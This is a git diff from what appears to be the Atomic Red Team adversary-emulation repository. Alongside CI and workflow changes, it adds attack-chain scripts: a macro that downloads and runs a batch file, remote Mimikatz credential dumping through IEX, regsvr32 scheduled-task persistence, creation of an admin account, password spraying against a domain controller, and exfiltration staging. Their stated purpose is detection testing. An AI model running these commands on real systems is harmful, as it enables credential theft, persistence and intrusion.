Compare commits

..

2 Commits

Author SHA1 Message Date
Keith McCammon f475ca3b1e Use site URL 2019-05-07 08:42:29 -06:00
Keith McCammon 0c4c29b19d Initial checkin of admin documentation. 2019-05-07 08:37:26 -06:00
1583 changed files with 183242 additions and 1829965 deletions
+51
View File
@@ -0,0 +1,51 @@
version: 2
defaults: &defaults
docker:
- image: circleci/ruby:2.4
workflows:
version: 2
validate-then-generate-docs:
jobs:
- validate_atomics_generate_docs
jobs:
validate_atomics_generate_docs:
<<: *defaults
steps:
- checkout
- add_ssh_keys
- run:
name: Validate the format of atomic tests against the spec
command: |
bin/validate-atomics.rb
- run:
name: Generate nice markdown document for atomics
command: |
bin/generate-atomic-docs.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
#elif [[ "${CIRCLE_BRANCH}" == "master" ]]; then
# echo "Not committing documentation because we are on master and doc changes should be part of pull request branches"
elif [[ $(echo "$CIRCLE_BRANCH" | grep -c "pull") -gt 0 ]]; then
echo "Not committing documentation because we are on a pull request branch that we don't have push permissions to"
else
git config credential.helper 'cache --timeout=120'
git config user.email "<email>"
git config user.name "CircleCI Atomic Red Team doc generator"
git add atomics
git commit -am "Generate docs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH"
git push -u origin $CIRCLE_BRANCH
fi
-26
View File
@@ -1,26 +0,0 @@
{
"image": "mcr.microsoft.com/devcontainers/universal:2",
"features": {
"ghcr.io/devcontainers/features/powershell:1": {},
"ghcr.io/natescherer/devcontainers-custom-features/powershell-resources:1": {
"resources": "powershell-yaml,invoke-atomicredteam"
}
},
"remoteUser": "root",
"onCreateCommand": "pwsh /workspaces/atomic-red-team/.devcontainer/setup.ps1",
"customizations": {
"vscode": {
"extensions": [
"ms-vscode.powershell"
],
"settings": {
"terminal.integrated.defaultProfile.linux": "pwsh",
"terminal.integrated.profiles.linux": {
"pwsh": {
"path": "/usr/bin/pwsh"
}
}
}
}
}
}
-7
View File
@@ -1,7 +0,0 @@
New-Item $PROFILE -Force
Set-Variable -Name "InvokePath" -Value (Get-Item /usr/local/share/powershell/Modules/Invoke-AtomicRedTeam/**/Invoke-AtomicRedTeam.psd1).FullName
Write-Output @"
Import-Module $InvokePath -Force
`$PSDefaultParameterValues`["Invoke-AtomicTest:PathToAtomicsFolder"] = "/workspaces/atomic-red-team/atomics";
`$PSDefaultParameterValues`["Invoke-AtomicTest:ExecutionLogPath"]="$HOME/AtomicRedTeam/execution.csv";
"@ > $PROFILE
-29
View File
@@ -1,29 +0,0 @@
---
name: Idea
about: An idea for a feature or improvement to Atomic Red Team.
title: 'Idea: '
labels: 'idea'
assignees: ''
---
### Use-cases
<!---
In order to properly evaluate a feature request, it is necessary to understand the use-cases for it.
Please describe below the _end goal_ you are trying to achieve that has led you to request this feature.
Please keep this section focused on the problem and not on the suggested solution. We'll get to that in a moment, below!
-->
### Proposal
<!---
If you have an idea for a way to address the problem via a change, please describe it below.
If you're not sure of some details, don't worry! When we evaluate the feature request we may suggest modifications.
-->
### References
<!--
Anything else, such as links to other issues or examples, that didn't seem to fit above.
-->
-19
View File
@@ -1,19 +0,0 @@
---
name: Submit a new test
about: Submit a new Atomic Red Team atomic test.
title: 'TXXX: Your test name here'
labels: 'new-test'
assignees: ''
---
<!--
For reference, check out this article that explains how to properly submit a new atomic test: https://www.atomicredteam.io/atomic-red-team/docs/designing-atomic-tests.
-->
### Technique ID: TXXXX
### Additional Details
<!--
Anything you'd like to share or explain that isn't represented in the contents of the YAML-based test definition.
-->
-19
View File
@@ -1,19 +0,0 @@
---
name: Website change
about: Propose a change to the website at https://atomicredteam.io
title: 'Website: '
labels: 'website'
assignees: ''
---
### Why the change?
### A summary of the change
### References
<!--
Anything else, such as links to other issues or examples, that didn't seem to fit above.
-->
-16
View File
@@ -1,16 +0,0 @@
# To get started with Dependabot version updates, you'll need to specify which
# package ecosystems to update and where the package manifests are located.
# Please see the documentation for all configuration options:
# https://docs.github.com/github/administering-a-repository/configuration-options-for-dependency-updates
version: 2
updates:
- package-ecosystem: "pip" # See documentation for possible values
directory: "/" # Location of package manifests
schedule:
interval: "weekly"
# Maintain dependencies for GitHub Actions
- package-ecosystem: "github-actions"
directory: "/"
schedule:
interval: "weekly"
@@ -1,11 +1,5 @@
---
name: Problem
about: Tell us about a problem you've encountered.
title: 'Problem: '
labels: 'problem'
assignees: ''
# Report
---
## What did you do?
Please replace this with what you did.
@@ -29,4 +23,4 @@ e.g. 💥
* If relevant, which [execution harness](2) are you attempting to use?
[1]: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics "atomic tests"
[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"
[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"
-59
View File
@@ -1,59 +0,0 @@
name: assign-labels
on:
workflow_run:
workflows: ["validate-atomics"]
types:
- completed
jobs:
assign-labels:
runs-on: ubuntu-latest
steps:
- name: download-artifact
uses: actions/github-script@v9
with:
script: |
let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
owner: context.repo.owner,
repo: context.repo.repo,
run_id: context.payload.workflow_run.id,
});
let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
return artifact.name == "labels.json"
})[0];
let download = await github.rest.actions.downloadArtifact({
owner: context.repo.owner,
repo: context.repo.repo,
artifact_id: matchArtifact.id,
archive_format: 'zip',
});
let fs = require('fs');
fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/labels.zip`, Buffer.from(download.data));
- name: unzip-artifact
run: unzip labels.zip
- name: assign-labels-and-reviewers
uses: actions/github-script@v9
with:
script: |
let fs = require('fs');
const obj = JSON.parse(fs.readFileSync('./labels.json'));
console.log(obj)
if(obj.labels.length > 0){
await github.rest.issues.addLabels({
issue_number: obj.pr,
owner: context.repo.owner,
repo: context.repo.repo,
labels: obj.labels
})
}
if(obj.maintainers.length > 0){
await github.rest.issues.addAssignees({
issue_number: obj.pr,
owner: context.repo.owner,
repo: context.repo.repo,
assignees: obj.maintainers
});
}
-68
View File
@@ -1,68 +0,0 @@
name: generate-docs
on:
push:
branches: [ "master" ]
jobs:
generate-docs:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v6
with:
token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
- name: Install poetry
run: pipx install poetry
- uses: actions/setup-python@v6
with:
python-version: "3.11.2"
cache: "poetry"
- name: Install dependencies
run: poetry install --no-interaction
- name: Generate shields.io URL
run: poetry run python runner.py generate-counter
id: counter
working-directory: atomic_red_team
env:
PYTHONPATH: ${{ github.workspace }}
- name: Update README
run: |
echo ${{ steps.counter.outputs.result }}
sed -i "s|https://img.shields.io/badge/Atomics-.*-flat.svg|${{ steps.counter.outputs.result }}|" README.md
shell: bash
- name: Generate and commit unique GUIDs for each atomic test
run: poetry run python runner.py generate-guids
working-directory: atomic_red_team
env:
PYTHONPATH: ${{ github.workspace }}
- name: Generate markdown docs for atomics
run: poetry run python runner.py generate-docs
working-directory: atomic_red_team
env:
PYTHONPATH: ${{ github.workspace }}
- name: commit generated changes
run: |
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
else
git config credential.helper 'cache --timeout=120'
git config user.email "opensource@redcanary.com"
git config user.name "Atomic Red Team doc generator"
git add README.md
git add atomics
git commit -am "Generated docs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [ci skip]"
git push origin $GITHUB_REF_NAME -f
fi
-29
View File
@@ -1,29 +0,0 @@
name: validate-python-file-changes
on:
pull_request:
branches:
- master
paths:
- "atomic_red_team/**/*.py"
jobs:
validate-python-file-changes:
runs-on: macos-latest
steps:
- name: checkout repo
uses: actions/checkout@v6
- name: Install poetry
run: pipx install poetry
- name: setup python3.11
uses: actions/setup-python@v6
id: setup-python
with:
python-version: "3.12.4"
cache: "poetry"
- name: Install dependencies
run: poetry install --no-interaction
- name: Run pytest
run: poetry run pytest atomic_red_team/tests
-19
View File
@@ -1,19 +0,0 @@
name: 'Close stale issues and PRs'
on:
schedule:
- cron: '30 1 * * *'
jobs:
stale:
runs-on: ubuntu-latest
steps:
- uses: actions/stale@v10
with:
stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
close-issue-message: 'This issue was closed because it has been stalled for 5 days with no activity.'
close-pr-message: 'This PR was closed because it has been stalled for 10 days with no activity.'
days-before-issue-stale: 30
days-before-pr-stale: 45
days-before-issue-close: 10
days-before-pr-close: 10
-75
View File
@@ -1,75 +0,0 @@
name: validate-atomics
on:
pull_request:
branches:
- master
jobs:
validate-atomics:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v6
- name: Install poetry
run: pipx install poetry
- name: setup python3.11
uses: actions/setup-python@v6
id: setup-python
with:
python-version: "3.11.2"
cache: "poetry"
- name: Install dependencies
run: poetry install --no-interaction
- name: validate the format of atomics tests against the spec
run: poetry run python runner.py validate
working-directory: atomic_red_team
env:
PYTHONPATH: ${{ github.workspace }}
upload:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v6
- name: Install poetry
run: pipx install poetry
- name: setup python3.11
uses: actions/setup-python@v6
id: setup-python
with:
python-version: "3.11.2"
cache: "poetry"
- uses: actions/github-script@v9
id: get_pr_number
with:
script: |
if (context.issue.number) {
// Return issue number if present
return context.issue.number;
} else {
// Otherwise return issue number from commit
return (
await github.rest.repos.listPullRequestsAssociatedWithCommit({
commit_sha: context.sha,
owner: context.repo.owner,
repo: context.repo.repo,
})
).data[0].number;
}
result-encoding: string
- name: Install dependencies
run: poetry install --no-interaction --no-root
- name: save labels and reviewers into a file.
run: |
poetry run python runner.py generate-labels --pr '${{steps.get_pr_number.outputs.result}}' --token ${{ secrets.GITHUB_TOKEN }}
working-directory: atomic_red_team
env:
PYTHONPATH: ${{ github.workspace }}
- uses: actions/upload-artifact@v7
with:
name: labels.json
path: atomic_red_team/pr/
-20
View File
@@ -1,20 +0,0 @@
name: validate-terraform
on:
pull_request:
branches:
- master
paths:
- "**/*.tf"
jobs:
validate-terraform:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v6
- uses: hashicorp/setup-terraform@v4
- name: Terraform fmt
id: fmt
run: terraform fmt -recursive -check
continue-on-error: false
-144
View File
@@ -2,151 +2,7 @@
.DS_Store
.vscode
.atom
atomic-red-team/enterprise-attack.json
# Compiled Object files
*.slo
*.lo
*.o
*.obj
# vs logs
*.tlog
*.log
# Precompiled Headers
*.gch
*.pch
docs/.sass-cache/
docs/_site/
**/Invoke-AtomicTest-ExecutionLog.csv
techniques_hash.db
# Credential files
*.creds
# Local .terraform directories
**/.terraform/*
# .tfstate files
*.tfstate
*.tfstate.*
**/*.terraform.lock.hcl
# Crash log files
crash.log
crash.*.log
# Ignore override files as they are usually used to override resources locally and so
# are not checked in
override.tf
override.tf.json
*_override.tf
*_override.tf.json
# Include override files you do wish to add to version control using negated pattern
# !example_override.tf
# Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan
# example: *tfplan*
# Ignore CLI configuration files
.terraformrc
terraform.rc
*.pyc
# The ExternalPayloads folder
ExternalPayloads
# Visual Studio 2015/2017 cache/options directory
.vs/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# ASP.NET Scaffolding
ScaffoldingReadMe.txt
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.tlog
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Node.js
node_modules/
# Python
__pycache__/
*.pyc
.hypothesis/
@@ -0,0 +1,48 @@
' Save Document As Single Web Page .mht
' Rename Document As .Doc
' This Document is modeled after FireEye's report on APT32
' Special Thanks to Nick Carr for his work on this write-up
' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
Sub AutoOpen()
Dim myURL As String
Dim myPath As String
If (MsgBox("You're Are About To Execute the ATOMIC Test for Dragon's Tail, You sure?", 1, vbMsgBoxSetForeground) = 2) Then
End ' This Ends Macro
End If
' Downloads Dragon's Tail Chain Reaction Script
myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat"
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", myURL, False, "username", "password"
WinHttpReq.send
myURL = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
Dim fso As Object
Const FLDR_NAME As String = "C:\Tools\"
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists(FLDR_NAME) Then
fso.CreateFolder (FLDR_NAME)
End If
' Change Path HERE
oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2 ' 1 = no overwrite, 2 = overwrite
' EXECUTE FROM PATH
Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
oStream.Close
End If
End Sub
@@ -0,0 +1,2 @@
### Group: Dragon's Tail
[Modeled After G0050](https://attack.mitre.org/wiki/Group/G0050)
+1
View File
@@ -0,0 +1 @@
# Chain Reactions
Binary file not shown.
+11
View File
@@ -0,0 +1,11 @@
#include <stdio.h>
// Simple Hello World for Atomic Red Team payload
int main() {
printf("Hello from Atomic Red Team! \n");
return 0;
}
Binary file not shown.
@@ -0,0 +1,19 @@
# Chain Reaction: Argonaut
# Tactics: Execution:Powershell, Discovery
# variable can be changed to $userprofile to drop the bat elsewhere
# TEMP=C:\Users\<username>\AppData\Local\Temp
$temp = $env:temp
# Note that these are alias' for Invoke-WebRequest.
# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat
# Alternate Ending: Using curl
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat
# Execute the 1.bat file
cmd.exe /c $temp\1.bat
@@ -0,0 +1,29 @@
::Chain Reaction - Cyclotron
::
:: In this test we will executing a binary multiple ways.
:: Some of these are Application Whitelisting Bypasses
:: Either Clone the Repo, or Download the AllTheThings DLL Somehow ;-)
REM X86
Executing X86 AllTheThings Test
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
regsvr32.exe /s /u AllTheThingsx86.dll
regsvr32.exe /s AllTheThingsx86.dll
rundll32 AllTheThingsx86.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx86.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx86.dll
REM AMD64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll
regsvr32.exe /s /u AllTheThingsx64.dll
regsvr32.exe /s AllTheThingsx64.dll
rundll32 AllTheThingsx64.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx64.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx64.dll
@@ -0,0 +1,42 @@
:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
:: Thanks to Nick Carr for his research on this group
:: Sample Representation of ATT&CK Techniques used by APT32
:: Tactics: Execution, Persistence, Privilege Escalation
:: Tactic: Privilege Escalation / Execution
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
:: Tactics: Execution
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
:: Tactics: Defense Evasion
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
:: To Encode A Command
:: $Text = '$file=(gi test.txt);$date=''7/16/1945 5:29am'';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date'
:: $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
:: $EncodedText =[Convert]::ToBase64String($Bytes)
:: $EncodedText
echo "Atomic Test File" > test.txt
::PowerShell.exe -com {$file=(gi test.txt);$date = '7/16/1945 5:29am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
PowerShell.exe -enc JABmAGkAbABlAD0AKABnAGkAIAB0AGUAcwB0AC4AdAB4AHQAKQA7ACQAZABhAHQAZQA9ACcANwAvADEANgAvADEAOQA0ADUAIAA1ADoAMgA5AGEAbQAnADsAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEwAYQBzAHQAQQBjAGMAZQBzAHMAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEMAcgBlAGEAdABpAG8AbgBUAGkAbQBlAD0AJABkAGEAdABlAA==
:: Tactics: Defense Evasion
:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
:: Deletes File, detection here would be File Modification
::del test.txt
@@ -0,0 +1,37 @@
# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
# Thanks to Nick Carr for his research on this group
# Sample Representation of ATT&CK Techniques used by APT32
# Tactics: Execution, Persistence, Privilege Escalation
# Tactic: Privilege Escalation / Execution
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
# Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Tactics: Defense Evasion
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
$test = "Atomic Test File"
set-content -path test.txt -value $test
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
# Tactics: Defense Evasion
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
# Deletes File, detection here would be File Modification
del test.txt
Write-Host "Done" -Fore Green
@@ -0,0 +1,56 @@
:: Chain Reaction - Fission
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
::
:: This particular Chain Reaction focuses on Discovery.
:: Tactic: Discovery
:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
:: Change IP scheme for your environment
:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
net.exe view
net.exe view /domain
:: Tactic: Discovery
:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
net localgroup "administrators"
wmic useraccount get /ALL
:: Tactic: Discovery
:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show all profiles
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Execution
:: Tactic: Discovery
:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
ipconfig /all
arp -a
nbtstat -n
:: Tactic: Discovery
:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
dir /s c:\ >> %temp%\download
:: Tactic: Execution
:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
:: Download and invoke BloodHound Ingestor
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
@@ -0,0 +1,33 @@
:: Chain Reaction 01
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: This particular Chain Reaction focuses on generating event noise.
:: Tactics: Persistence, Defense Evasion
:: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: RegSvr32 https://attack.mitre.org/wiki/Technique/T1117
:: This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
:: Tactic: Discovery
:: Execution: https://attack.mitre.org/wiki/Technique/T1086
:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
:: Tactic: Credential Access
:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
:: Add a user, then add to group
Net user /add Trevor SmshBgr123
:: Add user to group
net localgroup administrators Trevor /add
ECHO Well that was fun!
pause
+106
View File
@@ -0,0 +1,106 @@
#!/bin/sh
# Chain Reaction Ranger
# NOTE it is a BAD idea to execute scripts from a repo that you do not control.
# NOTE We recommend executing from a server that you control.
# NOTE Thank You :)
# This particular Chain Reaction focuses on simulating reconnaisance and staging files for exfiltration
# Tactic: Collection
# Technique: Data Staged https://attack.mitre.org/wiki/Technique/T1074
# Tactic: Defense Evasion
# Technique: Hidden Files and Directories https://attack.mitre.org/wiki/Technique/T1158
# Create a hidden directory to store our collected data in
mkdir -p /tmp/.staging_art/
mkdir -p /tmp/.exfil/
# Tactic: Discovery
# Technique: System Information Discovery https://attack.mitre.org/wiki/Technique/T1082
# Determine Platform and Gather System Information
SYSINF=/tmp/.staging_art/system.txt
MACCHECK="$(sw_vers -productName | cut -d ' ' -f1)"
if [[ "$MACCHECK" == "Mac" ]]; then
PLAT="Mac"
else
PLAT="Linux"
fi
echo "Testing: Platform is" $PLAT
echo "Platform: " $PLAT >> $SYSINF
echo "Kernel:" >> $SYSINF && uname -a >> $SYSINF
echo "Testing: Gathering General Release Information"
if [ "$PLAT" = "Mac" ]; then
echo "Testing: Gathering macOS Release Information"
echo "System Profiler:" >> $SYSINF
system_profiler >> $SYSINF 2> /dev/null
else
echo "Testing: Gathering Linux Release Information"
echo "Release:" >> $SYSINF
lsb_release >> $SYSINF 2> /dev/null
fi
# Tactic: Discovery
# Technique: Account Discovery https://attack.mitre.org/wiki/Technique/T1087
# Collect User Account Information
USERINF=/tmp/.staging_art/users.txt
echo "Testing: Gathering User Information"
echo "Whoami:" >> $USERINF && whoami >> $USERINF
echo "Current User Activity:" >> $USERINF && w >> $USERINF 2> /dev/null
echo "Sudo Privs" >> $USERINF && sudo -l -n >> $USERINF 2> /dev/null
echo "Sudoers" >> $USERINF && cat /etc/sudoers >> $USERINF 2> /dev/null
echo "Last:" >> $USERINF && last >> $USERINF 2> /dev/null
if [ "$PLAT" == "Mac" ]; then
echo "Testing: Gathering Mac Group Information"
echo "Group Information:" >> $USERINF
dscl . list /Groups >> $USERINF
dscacheutil -q group >> $USERINF
else
echo "Testing: Gathering Linux Group Information"
echo "Group Information:" >> $USERINF
cat /etc/passwd >> $USERINF
echo "Elevated Users" >> $USERINF && grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' >> $USERINF
fi
# Tactic: Discovery
# Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
# Check for common security Software
SECINF=/tmp/.staging_art/security.txt
echo "Testing: Gathering Security Software Information"
echo "Running Security Processes" >> $SECINF && ps ax | grep -v grep | grep -e Carbon -e Snitch -e OpenDNS -e RTProtectionDaemon -e CSDaemon -e cma >> $SECINF
# Tacttic: Exfiltration
# Technique: Data Compresssed https://attack.mitre.org/wiki/Technique/T1002
# Technique: Data Encrypted https://attack.mitre.org/wiki/Technique/T1022
# Compress and encrypt all collected data
echo "Testing: Zip up the Recon"
zip --password "Hope You Have Eyes on This!!" /tmp/.staging_art/loot.zip /tmp/.staging_art/* > /dev/null 2>&1
# Tacttic: Exfiltration
# Technique: Data Transfer Size Limits https://attack.mitre.org/wiki/Technique/T1030
# Split the file up into 23 byte chunks for easier exfiltration
echo "Testing: Split the file for Exfil"
split -a 15 -b 23 "/tmp/.staging_art/loot.zip" "/tmp/.exfil/loot.zip.part-"
# Tactic: Defense Evasion
# Technique: Delete File https://attack.mitre.org/wiki/Technique/T1107
# Delete evidence
rm -rf /tmp/.staging_art/
# Optionally, delete exfil directory to clean up
# rm -rf /tmp/.exfil/
@@ -0,0 +1,49 @@
:: Chain Reaction - Reactor
::
::
:: Tactic: Discovery
:: Technique: System Owner/User Discovery: https://attack.mitre.org/wiki/Technique/T1033
:: Single Endpoint
:: for /F "tokens=1,2" %%i in ('qwinsta /server:<COMPUTERNAME> ^| findstr "Active Disc"') do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Multiple Endpoints
@FOR /F %%n in (computers.txt) DO @FOR /F "tokens=1,2" %%i in ('qwinsta /server:%%n ^| findstr "Active Disc") do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Tactic: Credential Access, Lateral Movement
:: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110
:: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077
@FOR /F %%n in (usernames.txt) DO @FOR /F %%p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p 1>NUL 2>&1 && @echo [*] %%n:%%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
:: Tactic: Discovery
:: Technique: Security Software Discovery: https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show rule name=all
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Tactic: Execution, Discovery
:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
:: Technique: Multiple Discovery
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
:: Tactic: Collection
:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
for /R c: %%f in (*.docx) do copy %%f c:\temp\
:: Tactic: Exfiltration
:: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002
cmd.exe /c powershell.exe Compress-Archive -Path C:\temp\* -CompressionLevel Optimal -DestinationPath C:\temp\allthedataz.zip
@@ -0,0 +1,16 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>cookie-miner-backdoor-launchagent.plist</string>
<key>ProgramArguments</key>
<array>
<string>python</string>
<string>-c</string>
